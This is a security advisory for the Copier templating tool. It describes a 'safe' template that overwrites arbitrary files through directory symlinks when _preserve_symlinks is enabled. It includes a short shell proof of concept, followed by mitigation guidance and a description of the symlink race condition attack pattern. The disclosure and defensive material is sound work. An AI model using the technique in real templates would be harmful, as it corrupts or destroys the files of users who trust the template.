  "details": "### Impact\n\nCopier suggests that it\u0027s safe to generate a project from a safe template, i.e. one that doesn\u0027t use [unsafe](https://copier.readthedocs.io/en/stable/configuring/#unsafe) features like custom Jinja extensions which would require passing the `--UNSAFE,--trust` flag. As it turns out, a safe template can currently write to arbitrary directories outside the destination path by using directory a symlink along with [`_preserve_symlinks: true`](https://copier.readthedocs.io/en/stable/configuring/#preserve_symlinks) and a [generated directory structure](https://copier.readthedocs.io/en/stable/configuring/#generating-a-directory-structure) whose rendered path is inside the symlinked directory. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user\u0027s write permissions), e.g., to cause havoc.\n\n\u003e [!NOTE]\n\u003e\n\u003e At the time of writing, the exploit is non-deterministic, as Copier walks the template\u0027s file tree using [`os.scandir`](https://docs.python.org/3/library/os.html#os.scandir) which yields directory entries in arbitrary order.\n\nReproducible example (may or may not work depending on directory entry yield order):\n\n```shell\nmkdir other/\npushd other/\necho \"sensitive\" \u003e sensitive.txt\npopd\n\nmkdir src/\npushd src/\nln -s ../other other\necho \"overwritten\" \u003e \"{{ pathjoin(\u0027other\u0027, \u0027sensitive.txt\u0027) }}.jinja\"\necho \"_preserve_symlinks: true\" \u003e copier.yml\ntree .\n# .\n# \u251c\u2500\u2500 copier.yml\n# \u251c\u2500\u2500 other -\u003e ../other\n# \u2514\u2500\u2500 {{ pathjoin(\u0027other\u0027, \u0027sensitive.txt\u0027) }}.jinja\n#\n# 1 directory, 2 files\npopd\n\nuvx copier copy --overwrite src/ dst/\n\ncat other/sensitive.txt\n# overwritten\n```\n\n### Patches\n\nn/a\n\n### Workarounds\n\nn/a\n\n### References\n\nn/a",
  "id": "GHSA-4fqp-r85r-hxqh",
  "modified": "2026-02-02T16:33:53Z",
  "published": "2026-01-21T22:19:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/copier-org/copier/security/advisories/GHSA-4fqp-r85r-hxqh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23986"
    },
    {
      "type": "WEB",
      "url": "https://github.com/copier-org/copier/commit/b3a7b3772d17cf0e7a4481978188c9f536c8d8f6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/copier-org/copier"
    },
    {
      "type": "WEB",
      "url": "https://github.com/copier-org/copier/releases/tag/v9.11.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Copier safe template has arbitrary filesystem write access via directory symlinks when _preserve_symlinks: true "
}

Mitigation
Implementation

Symbolic link attacks often occur when a program creates a tmp directory that stores files/links. Access to the directory should be restricted to the program as to prevent attackers from manipulating the files.

Mitigation MIT-48.1
Architecture and Design

Strategy: Separation of Privilege

  • Follow the principle of least privilege when assigning access rights to entities in a software system.
  • Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-27: Leveraging Race Conditions via Symbolic Links

This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.